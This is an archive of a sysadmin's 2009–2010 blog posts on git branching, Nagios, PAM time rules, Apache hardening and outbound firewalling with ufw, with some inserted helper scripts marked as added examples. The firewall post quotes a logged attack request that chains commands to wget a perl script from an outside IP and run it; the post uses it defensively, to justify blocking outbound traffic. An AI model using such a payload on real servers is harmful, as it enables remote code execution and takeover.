release safely and iterate quickly with git branches
rene — Sun, 01/10/2010 - 20:58
Branches are cheap in git. This is how I use branches to release safely and iterate quickly.
I commit a fix in a dev branch
$ git commit -v -m 'closes #101'
$ git branch
* dev
  master
I create a new branch called dev-master, where I will do the actual merging of the two branches. The parent of the dev-master branch will be the dev branch.
$ git checkout -b dev-master
Switched to a new branch "dev-master"
$ git branch
  dev
* dev-master
  master
I then merge master
$ git merge master
I change to the master branch and merge dev-master
$ git checkout master
Switched to branch "master"
$ git merge dev-master
Push to origin and clean up
$ git push origin master
$ git branch -d dev-master
If there is a conflict or if I need to back out of the merge I can do all the hard work in the dev-master branch without impacting any other branches.
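The workflow above, run in a throwaway repository as an added example (not code from the original post), to show the last paragraph's point: when the merge on dev-master conflicts it can be thrown away, and dev and master are left exactly as they were. It assumes git is installed; the commit identity is passed with -c so ~/.gitconfig is never touched.

```shell
#!/bin/sh
# Added example, not from the original post: run the dev-master workflow in
# a throwaway repository and show that a conflicting merge can be discarded
# on dev-master while dev and master stay untouched.
GIT='git -c user.name=example -c user.email=example@example.invalid'

# make_repo DIR -> repo where dev (the fix) and master (a hotfix) both edited
# app.conf, so merging master into dev-master will conflict
make_repo() {
    rm -rf "$1" && mkdir -p "$1" && cd "$1" || return 1
    $GIT init -q && $GIT symbolic-ref HEAD refs/heads/master
    echo 'version 1' > app.conf
    $GIT add app.conf && $GIT commit -q -m 'initial import'
    $GIT checkout -q -b dev
    echo 'version 1 (fix for #101)' > app.conf
    $GIT commit -q -am 'closes #101'
    $GIT checkout -q master
    echo 'version 2' > app.conf
    $GIT commit -q -am 'hotfix on master'
    cd - > /dev/null
}

# integrate DIR -> the post's steps: branch dev-master off dev, merge master
# into it, then merge dev-master into master and delete it. Returns 0 on a
# clean merge; on a conflict it aborts, deletes dev-master and returns 1.
integrate() {
    cd "$1" || return 2
    $GIT checkout -q dev
    $GIT checkout -q -b dev-master
    if $GIT merge -q master > /dev/null 2>&1; then
        $GIT checkout -q master
        $GIT merge -q dev-master
        $GIT branch -q -d dev-master
        cd - > /dev/null
        return 0
    fi
    # conflict: all the half-done work lives on dev-master, so discard it
    $GIT merge --abort
    $GIT checkout -q dev
    $GIT branch -q -D dev-master
    cd - > /dev/null
    return 1
}

# file_on DIR BRANCH -> contents of app.conf as committed on BRANCH
file_on() { (cd "$1" && $GIT show "$2:app.conf"); }

# branches DIR -> local branch names, to confirm dev-master is gone afterwards
branches() { (cd "$1" && $GIT for-each-ref --format='%(refname:short)' refs/heads); }
```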
Query an IBM ServeRAID adapter on the CLI
rene — Sun, 01/10/2010 - 20:40
I quickly needed to determine the status of a RAID array that sat on an IBM ServeRAID adapter. The boxen was running Ubuntu 9.04 x86_64; I didn't want to install RaidManager, nor did I want to install a Debian package. Here's how.
$ wget http://hwraid.le-vert.net/debian/pool-lenny/arcconf_6.10.18451-1_amd64.deb
$ ar -x arcconf_6.10.18451-1_amd64.deb
$ tar zxvf data.tar.gz
$ sudo ./usr/sbin/arcconf GETCONFIG 1
Install the Debian package if you need to.
Securing your web server by blocking outbound connections
rene — Tue, 11/24/2009 - 13:01
The majority of web servers out there have no need to query DNS servers or make external HTTP connections, yet these types of outbound packets are generally not firewalled off.
Take a quick search through your Apache logs for the 'wget' command and you may find requests that resemble something like this:
217.196.212.150 - - [09/Sep/2009:04:31:25 +1000] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;killall%20-9%20perl;rm%20-rf%20X0-lock;rm%20-rf%20font-nix;wget%20193.13.87.38/X0-locker;perl%20X0-locker HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
The above request shows a scripted HTTP query that attempts to pass several commands to the PHP file config.inc.php. Had it succeeded, it would have killed all perl processes owned by the user running the web server (www-data, the web server being Apache in this case), removed a few files, downloaded a perl script called X0-locker from an external site and then run that script with the privileges of www-data.
A catch-all fix for these types of attacks is to firewall all packets generated by the user running Apache.
Below I take this one step further and demonstrate how to block all outbound connections that we have not explicitly allowed, using Ubuntu. This includes outbound HTTP and DNS requests from the user running our web server. Whilst iptables is not Ubuntu specific, I use the ufw package, which ships with Ubuntu; the iptables rules I use can be bolted on top of most distributions if you change the chain names.
Firstly, let's install the ufw package
$ sudo apt-get install ufw
Set the default OUTPUT policy to DROP by editing /etc/default/ufw. This effectively drops every outgoing packet.
DEFAULT_OUTPUT_POLICY="DROP"
Enable ufw by setting ENABLED to yes by editing /etc/ufw/ufw.conf
ENABLED=yes
At this stage it's best to ensure that your remote console connection to your web server is working. If you don't have a remote console connection, you can add a small cron job that stops the ufw service, removing all the iptables rules.
Add the following cron job to /etc/cron.d/ufw
*/10 * * * * root /etc/init.d/ufw stop
ufw (version 0.27) has a --dry-run feature, though as far as I'm aware this does not work when editing rules in /etc/ufw/before.rules, which is where we're going next. I can't stress enough that without a remote console connection or the above cron job, you will most likely lock yourself out of your server.
Now to begin editing the iptables rules. Open /etc/ufw/before.rules and hash out (comment out) the following lines
-A ufw-before-output -p tcp -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
-A ufw-before-output -p udp -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
Find the COMMIT line in /etc/ufw/before.rules, which should be the last line. Just before the COMMIT line add the following
# http/s
-A ufw-before-input -p tcp --sport 1024:65535 -m multiport --dports 80,443 -j ACCEPT
# ssh
-A ufw-before-input -p tcp --dport 22 -j ACCEPT
# allow established packets through
-A ufw-before-output -p tcp -m state --state ESTABLISHED,RELATED -j ACCEPT
-A ufw-before-output -p udp -m state --state ESTABLISHED,RELATED -j ACCEPT
# ntp
-A ufw-before-output -m owner --uid-owner ntp -p udp -m multiport --dport 53,123 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
-A ufw-before-output -m owner --uid-owner root -p udp -m multiport --dport 53,123 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
# log
-A ufw-before-output -m limit --limit 3/min --limit-burst 10 -m state --state NEW -j LOG --log-uid
If you have a remote console connection to your server, it's best to log in through it now. If not, ensure the cron job that stops the ufw service is working. If neither of these 'backdoors' is working, be prepared to pay a visit to your data center and log in via the console.
Start ufw.
$ sudo /etc/init.d/ufw start
Check that the new iptables rules are in place
$ sudo iptables -L -n -v
We can easily test that the rules are in place and are blocking outbound connections from the web server by switching to the www-data user with su and generating an outbound DNS and HTTP request
$ sudo su - www-data -s /bin/bash
$ telnet www.google.com 80
telnet: could not resolve www.google.com/80: Name or service not known
As we haven't allowed outbound DNS requests from the www-data user, HTTP queries have no chance of getting through. You can relax this slightly by allowing DNS requests to be made by www-data. This may be required if your web applications make any host-based outbound queries (e.g. using the Google Maps API) or if your Apache configuration has host-based ACLs using an authorization module such as mod_authz_host.
To allow DNS requests by www-data but continue to block all other outbound connections initiated by the www-data user, add the following iptables rules just before the final ufw-before-output rule (the LOG rule)
-A ufw-before-output -m owner --uid-owner www-data -p tcp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
-A ufw-before-output -m owner --uid-owner www-data -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
Logging
Within the rules we added to log the packets that are blocked, we used the --log-uid option so that the log entries contain the UID and GID of the user who generated the offending outbound packet.
This extra piece of information is incredibly useful when debugging web applications and services that are trying to establish outbound connections:
Nov 22 20:52:52 web01 kernel: [569936.655730] IN= OUT=eth0 SRC=10.3.2.70 DST=66.249.89.99 LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=595 DF PROTO=TCP SPT=44742 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 UID=33 GID=33
From the above log entry we have the following important information, which helps determine what was blocked and whether we need to unblock it.
OUT=eth0 - the network interface the packet was routed out of
SRC=10.3.2.70 - the source IP address of your web server
DST=66.249.89.99 - the destination of the packet
PROTO=TCP - the protocol of the packet
DPT=80 - the destination port
UID=33 - the user id that generated the packet
GID=33 - the group id that generated the packet
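A small triage script for these LOG entries, as an added example (not code from the original post): it pulls the fields listed above out of each line, groups the blocked outbound flows by UID, destination and port, and lists what is still blocked for a given UID once some ports (say 53, after the www-data DNS rules) have been allowed. The log lines are constructed samples in the kernel's netfilter LOG format; the first mirrors the entry quoted above.

```shell
#!/bin/sh
# Added example, not from the original post: triage the LOG --log-uid
# entries produced by the rules above. Sample lines are constructed.
UFW_SAMPLE_LOG='Nov 22 20:52:52 web01 kernel: [569936.655730] IN= OUT=eth0 SRC=10.3.2.70 DST=66.249.89.99 LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=595 DF PROTO=TCP SPT=44742 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 UID=33 GID=33
Nov 22 20:52:55 web01 kernel: [569939.655731] IN= OUT=eth0 SRC=10.3.2.70 DST=66.249.89.99 LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=596 DF PROTO=TCP SPT=44743 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 UID=33 GID=33
Nov 22 20:53:10 web01 kernel: [569954.100001] IN= OUT=eth0 SRC=10.3.2.70 DST=10.3.2.1 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=601 DF PROTO=UDP SPT=40511 DPT=53 LEN=40 UID=33 GID=33
Nov 22 20:53:30 web01 kernel: [569974.200002] IN= OUT=eth0 SRC=10.3.2.70 DST=198.51.100.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=602 DF PROTO=TCP SPT=51000 DPT=25 WINDOW=5840 RES=0x00 SYN URGP=0 UID=33 GID=33
Nov 22 20:54:00 web01 kernel: [570004.300003] IN= OUT=eth0 SRC=10.3.2.70 DST=203.0.113.9 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=603 DF PROTO=TCP SPT=52000 DPT=443 WINDOW=5840 RES=0x00 SYN URGP=0 UID=1000 GID=1000'

# ufw_field LINE KEY -> value of KEY= in LINE, empty if absent (IN= is empty)
ufw_field() {
    printf '%s\n' "$1" | awk -v key="$2" '{
        for (i = 1; i <= NF; i++) {
            n = index($i, "=")
            if (n > 0 && substr($i, 1, n - 1) == key) { print substr($i, n + 1); exit }
        }
    }'
}

# ufw_summarise LOGTEXT -> "COUNT UID DST PROTO DPT" per distinct blocked flow,
# lowest UID first, so the noisiest blocked destinations stand out
ufw_summarise() {
    printf '%s\n' "$1" | awk '
        /OUT=/ {
            split("", f)                       # reset the per-line field map
            for (i = 1; i <= NF; i++) {
                n = index($i, "=")
                if (n > 0) f[substr($i, 1, n - 1)] = substr($i, n + 1)
            }
            c[f["UID"] " " f["DST"] " " f["PROTO"] " " f["DPT"]]++
        }
        END { for (k in c) print c[k], k }' | sort -k2,2n -k3,3 -k5,5n
}

# ufw_review LOGTEXT UID ALLOWED_DPTS -> blocked DST:DPT/PROTO flows for UID
# that are not on the comma-separated list of ports you have since allowed
# (e.g. 53 once the www-data DNS rules are in): what still needs a decision
ufw_review() {
    ufw_summarise "$1" | awk -v uid="$2" -v allowed=",$3," \
        '$2 == uid && index(allowed, "," $5 ",") == 0 { print $3 ":" $5 "/" $4 }'
}

ufw_summarise "$UFW_SAMPLE_LOG"
echo '--- www-data flows still blocked after allowing DNS ---'
ufw_review "$UFW_SAMPLE_LOG" 33 53
```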
Bricked iPhone replaced in 30 seconds
rene — Thu, 11/19/2009 - 16:48
Sitting at the store in the Apple Genius Bar, amongst fanbois and shiny expensive things, the "genius" who I had an "appointment" with looked at the phone for 30 seconds, commented on the Android phone I had in my hand and then said "One minute mate, just going up stairs".
90 seconds later, I'm given a new replacement iPhone 16GB 3GS. No questions asked. No original receipt requested. No money required. 60 seconds after that I walk out the store as another happy customer.
Compare this to a previous experience I had with a large Australian Telco. The phone I had purchased was dropping calls so I went to one of their stores to see if they could help. 15 minutes of interrogation, proof of purchase required and 14 days later I received not a new replacement but the same phone with new "insides", without being given a phone I could use whilst my original phone was out being repaired.
Love them or hate them, Apple do things right by their customers. The simplicity they produce within the products has extended through to the way they treat and support their customers. I'm more than a satisfied customer and will continue to purchase and use their products for a while yet.
Nagios, the monitoring tool that cried wolf
rene — Wed, 11/04/2009 - 09:49
I'm finding the Nagios check_load check becoming slightly annoying and noisy during short bursts of high load on servers, such as at 4am when /etc/cron.daily jobs usually run. There are also other checks that I run where I don't care if they go into a WARNING state. Having too many alerts sent out can be detrimental to a server monitoring system, as the poor person who gets the notifications will eventually consider Nagios to be crying wolf.
I need to know when servers hit a high load, though I only want to be notified if it's a sustained high load period. I also need to know when something is CRITICAL, though I don't really care if it's in a WARNING state. If I did care about a WARNING state, I would perhaps configure the check to use CRITICAL instead.
Anyhow, my Nagios configs are below.
For a simple check load service check I set max_check_attempts, which determines how many times Nagios will re-check the service after an error occurs, to a higher than usual value. If the check attempts reach the value of max_check_attempts and the service is still in error, Nagios changes the service to a HARD state, typically logging a CRITICAL alert. The default value of max_check_attempts is 5. It's also important to note that the duration between the checks is determined by retry_check_interval, which defaults to 1 (minute).
In this example, when the load average hits 8, Nagios will re-check the service 20 times at one minute intervals. If the load is still at 8 or higher after that, a CRITICAL alert will be sent.
define service {
use generic-service
hostgroup_name webservers
service_description check load
check_command check_nrpe!check_load!5,5,5 8,8,8
max_check_attempts 20
notification_interval 0
}
To configure only CRITICAL alerts to be sent to a contact I use the following contact configuration. The only real deviation from a standard configuration is service_notification_options, which determines which notification levels (warning, critical, unknown and recovery) are sent. I've removed w (warning) and u (unknown) as I only care about c (critical) and r (recovery) alerts.
define contact {
contact_name rene
alias Rene Cunningham
service_notification_period 24x7
host_notification_period 24x7
service_notification_options c,r
host_notification_options d,r
service_notification_commands notify-service-by-email
host_notification_commands notify-host-by-email
email rene@rene.bz
}
How's your ~/junkcode?
rene — Thu, 10/29/2009 - 07:46
At LCA 2004 Andrew Tridgell gave an excellent presentation on his junkcode directory. A few snippets from the presentation:
Most programmers write bits of junkcode at one time or another. It's an important part of learning to be a better programmer. ... In this talk I hope to convince you to value your junkcode, and to keep it rather than deleting it when it has served its initial purpose. Today's junk can help you build tomorrow's killer app. ... Your junkcode directory forms a type of toolbox. ... Instead of telling people "I once wrote a program that does that" I can say "here is a program that does that". A great way to impress the boss!
You can download the entire presentation here.
I'm sure many of the participants in the room who hadn't already created a ~/junkcode directory immediately found this talk extremely high value and busted open a shell, running `mkdir ~/junkcode`. I know I did. To this day I still use my ~/junkcode. Although I'm not as game as Andrew to publish it online, I've stuck it in a git repo which I pull and push from various machines. I've found it an invaluable part of my toolbox as a programmer and consider myself fortunate that I was able to attend a talk that has certainly provided me with a lifelong lesson. If you haven't already created a ~/junkcode directory, bust open that shell, run mkdir ~/junkcode and jump on the junkcode bus today!
importing rows from another table in MySQL
rene — Wed, 05/27/2009 - 08:53
Looking for a quick way to import data from one table into another within MySQL?
I found this quick and dirty solution, which solved a problem I thought would involve a bit more SQL than a single INSERT and SELECT.
INSERT INTO tableFoo.bar
SELECT * FROM tableFye.foe;
Probably one of the few cases where you can use SELECT * and not get laughed at by your friendly DBA.
Time delays when opening documents in OO.org 3
rene — Thu, 05/21/2009 - 14:55
I'm pretty sure I've been stung by OO.org bug #94033 or #101398, and it hurts. Both describe a significant time delay when opening certain document files with controls. I can reproduce the delay on Microsoft Word documents that include embedded objects.
Hopefully upgrading to OO.org 3.1 following this tutorial resolves the issue. Another suggestion is to downgrade to OO.org 2.41.
Until then, it's AbiWord and friends.
Spacewalk install and the ojdbc14.jar dangling link
rene — Fri, 05/15/2009 - 16:50
After wrestling with Red Hat's Spacewalk Install Guide I was getting the following installation error.
* Deploying configuration files.
* Update configuration in database.
* Setting up Cobbler..
* Restarting services.
Tomcat failed to start properly or the installer ran out of tries. Please check /var/log/tomcat5/catalina.out for errors.
Installation complete.
/var/log/tomcat5/catalina.out had the following error
2009-05-15 16:15:12,206 [TP-Processor3] FATAL org.hibernate.connection.C3P0ConnectionProvider - JDBC Driver class not found: oracle.jdbc.driver.OracleDriver
After further investigation and several hair-pulling moments I found that /var/lib/tomcat5/webapps/rhn/WEB-INF/lib/ojdbc14.jar was a dangling link. It links to /usr/share/java/ojdbc14.jar, which in turn links to /usr/lib/oracle/10.2.0.4/client/lib/ojdbc14.jar, which didn't exist on my install.
After fixing the dangly bit by linking it to an existing ojdbc14.jar file, Spacewalk installs!
$ sudo rm /usr/share/java/ojdbc14.jar
$ sudo ln -sf /usr/lib/oracle/xe/app/oracle/product/10.2.0/server/jdbc/lib/ojdbc14.jar /usr/share/java/ojdbc14.jar
Graphing your server's motherboard temperature and fan RPM speeds
rene — Thu, 04/16/2009 - 07:30
Cacti, the "complete network graphing solution", is a powerful web application that provides rrdtool graphing templates and data collection methods. Think web based system graphing and collection platform.
There is a small learning curve in creating advanced graphs, though once you flatten this curve you're able to harness the power of Cacti to do fancy things like graphing your motherboard temperature and fan RPM speeds.
Here's how
yet another android review
rene — Mon, 02/16/2009 - 17:30
I picked up a G1 Android phone from Optus at lunch and here is my obligatory YAAR (Yet Another Android Review). I'm not really much of a reviewer so I've hackishly whipped up positives and negatives I've found with the phone so far. I have no doubt that some of the negatives will be fixed in Cupcake.
the android is here
rene — Sun, 02/15/2009 - 17:32
Google's Android G1 phone lands in AU tomorrow and will be sold to customers as the HTC Dream through Optus.
I had a quick play with a demo unit and my first thoughts are
* It's not as physically bulky as I thought it would be.
* Nearly twice as thick as an iPhone gen 1 and just a little bit longer in length.
* Android interface is fluid and smooth.
* Google maps street view blew me away.
* Physical keyboard is much better than the soft keyboard on an iPhone
* Could be annoying for quick SMSes and emails as you will have to slide the G1 open.
* The 'chin' isn't too bad and it didn't take up too much 'pocket real estate'
* Real buttons will seem a bit strange to people who have used iPhones for a while
how much money are iphone developers making?
rene — Thu, 02/12/2009 - 15:00
The Apple app store is certainly a disruptive market place which has changed the way mobile applications are developed and delivered. Apple has lowered the barrier to entry when it comes to creating mobile applications and though Apple will take 30% of your total sales, they will provide the sales, billing, distribution and development platforms. This has allowed developers to concentrate on what they love/do best, writing code without having to worry about marketing, distribution and setting up payment gateways.
But how much are iPhone developers making?
redirect all outgoing email to a single account with postfix
rene — Wed, 01/28/2009 - 22:10
Lab environments can get fairly messy if they are not maintained and the gentle hand of a sysadmin is not routinely applied. Security compliance is generally the last thing on a developer's mind whilst hacking away at projects still in the development stage. Having lab databases filled with unobfuscated customer data, which is never a good idea, is unfortunately common.
I'm not condoning having real customer data in a lab environment, though it does happen, and there is real potential for a disaster to occur, such as testing out your latest 'mass email 2.0' code on your lab database without realising that your lab data is actually a production data set. Oh yer, you also forgot to firewall outbound port 25/tcp, as well as having recursion available within your internal BIND9 view. Doh!@# Heck, having your lab have any access to the intertubes is just a plain bad idea.. period.
sad day for the interwebs as tshirthell.com closes
rene — Tue, 01/27/2009 - 18:02
TechCrunch reported today that tshirthell.com is closing its doors.. for good. 'Tis a sad day for the interwebs when such an iconic 'free speech' site decides to close its doors.
Oh well, it does look like Sunshine made enough coin to keep life interesting and has held out on selling the company for what probably would be a couple of million.
tshirthell.com owner, Sunshine Megatron, who gave away $25,000 on givemeaname.com to the person who came up with his new name, writes
I’m done. I’m finished. I can’t take the stupidity anymore, so I’m leaving and I’m taking my website with me. As of Tuesday, Feb 10, 2009, T-Shirt Hell will be no more.
No, I’m not selling out to some douchebag corporate entity. No, we’re not being sued by any of the over 40 companies that have sent us cease and desists over the years. No, I’m not going to jail (yet) and no, it’s not because of the economy. Although, the recent dip in sales certainly does make the idea easier to accept, even though we still sell over 3000 shirts a week.
I started this company in June of 2001, nearly 8 years ago, with the intention of producing the best satirical, the most controversial, the funniest t-shirts on the internet. Generally speaking, I feel I’ve accomplished that and am satisfied with what we’ve put out. I made a shitload of dough along the way. I’ve done cocaine off the better body parts of supermodels. I’ve even raped and killed a mountain panda in the hills of Shaanxi. But these perks are besides the point.
Read Sunshine's full letter here.
10 speeches given by some of today's technology CEOs
rene — Mon, 01/26/2009 - 19:53
CEOs have the power to turn around entire companies, making them some of the most influential people on the planet. It's always interesting to hear what they have to say about their companies, the products and services they offer and where they think the future is heading.
Bill Gates turned around Microsoft and outlined the Internet's importance with the internal memo titled The Internet Tidal Wave. Louis Gerstner transformed IBM in the 90s from a hardware company to a highly focused, customer-driven services company. Both were highly influential CEOs who saw opportunity and turned their companies around before it was too late. Below are some interviews and speeches I've rounded up from YouTube by some of the most powerful CEOs in the technology industry.
Steve Jobs - Apple - Wikipedia
Steve's Stanford commencement speech, in which he talks about life and how he started Apple and Pixar Animation.
6 quick steps to securing Apache
rene — Mon, 01/19/2009 - 20:13
Ever seen your web server's 404 page with something like the following in its footer?
Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 proxy_html/2.5 Server
From this, crackers are able to determine whether your version of Apache, PHP, Linux distribution or mod_proxy module is vulnerable to any known exploits. With two lines in your Apache conf you can disable this banner.
ServerTokens Prod
ServerSignature Off
sync google contacts and calendar with your iPhone using nuevasync
rene — Sun, 01/18/2009 - 20:52
pluggable authentication modules - time based ssh logins
rene — Sat, 01/03/2009 - 22:11
ssh;*;rene;!Wk0900-1730
Then add the following line to /etc/pam.d/ssh
account required pam_time.so
Check out the time.conf(5) and pam_tally(8) man pages for some more examples of time.conf entries.
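A small evaluator for time.conf lines like the one above, added here as an example and not pam_time's own code, so you can check what a rule permits for a given service, user, weekday and time before it goes into /etc/security/time.conf. It implements a subset of the time.conf(5) syntax, as stated in the comments: one time term per line (no & or | logic), the day codes Mo..Su plus Wk, Wd and Al, a leading ! that negates the term, and ranges that wrap past midnight.

```shell
#!/bin/sh
# Added example, not pam_time's own code: evaluate a time.conf line against
# a service, user, weekday and HHMM time. Subset of time.conf(5): one time
# term per line, no & or | logic; day codes Mo Tu We Th Fr Sa Su plus
# Wk (Mo-Fr), Wd (Sa-Su) and Al (every day); a leading ! negates the whole
# term; a range whose end is earlier than its start wraps past midnight.

# time_term_allows TERM DAY HHMM -> exit 0 if TERM permits DAY at HHMM,
# 1 if it denies, 2 if TERM is malformed. DAY is Mo..Su, HHMM e.g. 1200.
time_term_allows() {
    awk -v term="$1" -v day="$2" -v now="$3" 'BEGIN {
        neg = 0
        if (substr(term, 1, 1) == "!") { neg = 1; term = substr(term, 2) }
        if (!match(term, /[0-9][0-9][0-9][0-9]-[0-9][0-9][0-9][0-9]$/)) exit 2
        days  = substr(term, 1, RSTART - 1)
        start = substr(term, RSTART, 4) + 0
        end   = substr(term, RSTART + 5, 4) + 0
        gsub(/Wk/, "MoTuWeThFr", days)          # expand the group codes
        gsub(/Wd/, "SaSu", days)
        gsub(/Al/, "MoTuWeThFrSaSu", days)
        dayhit = (index(days, day) > 0)
        if (start <= end) timehit = (now + 0 >= start && now + 0 <= end)
        else              timehit = (now + 0 >= start || now + 0 <= end)
        hit = (dayhit && timehit)
        exit (hit != neg) ? 0 : 1             # a leading ! flips the result
    }'
}

# time_rule_allows LINE SERVICE USER DAY HHMM -> exit 0 if LINE applies to
# SERVICE and USER and permits DAY at HHMM, 1 if it denies, 3 if the line
# does not apply to that service/user (pam_time then moves to the next line)
time_rule_allows() {
    svc=$(printf '%s' "$1" | cut -d';' -f1)
    usr=$(printf '%s' "$1" | cut -d';' -f3)
    term=$(printf '%s' "$1" | cut -d';' -f4)
    { [ "$svc" = '*' ] || [ "$svc" = "$2" ]; } || return 3
    { [ "$usr" = '*' ] || [ "$usr" = "$3" ]; } || return 3
    time_term_allows "$term" "$4" "$5"
}

# quick self-check against the rule from the post: rene may ssh in at any
# time except weekdays 09:00-17:30
RULE='ssh;*;rene;!Wk0900-1730'
for when in 'Mo 1200' 'Mo 1800' 'Sa 1200'; do
    set -- $when
    if time_rule_allows "$RULE" ssh rene "$1" "$2"; then echo "$when: allowed"
    else echo "$when: denied"; fi
done
```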
Clock: inserting leap second 23:59:60 UTC
rene — Fri, 01/02/2009 - 06:59
Interesting tidbits I found whilst investigating the above message in a kernel log.
- The first leap second was introduced on June 30, 1972 at 23:59:60.
- The decision to introduce a leap second and the announcement is officially made by the International Earth Rotation and Reference Systems Service body.
- The announcement by the IERS for the 31/12/2008 23:59:60 UTC leap second can be found here.
- A questionnaire has been raised within the IERS Gazette on whether the leap second should be abolished.
- The string 'Clock: inserting leap second' is found in kernel/time/ntp.c:143 of the 2.6.28 linux kernel.
- The unix localtime() function did not cater for the leap seconds. This was fixed by vendors who applied the Olson time libraries.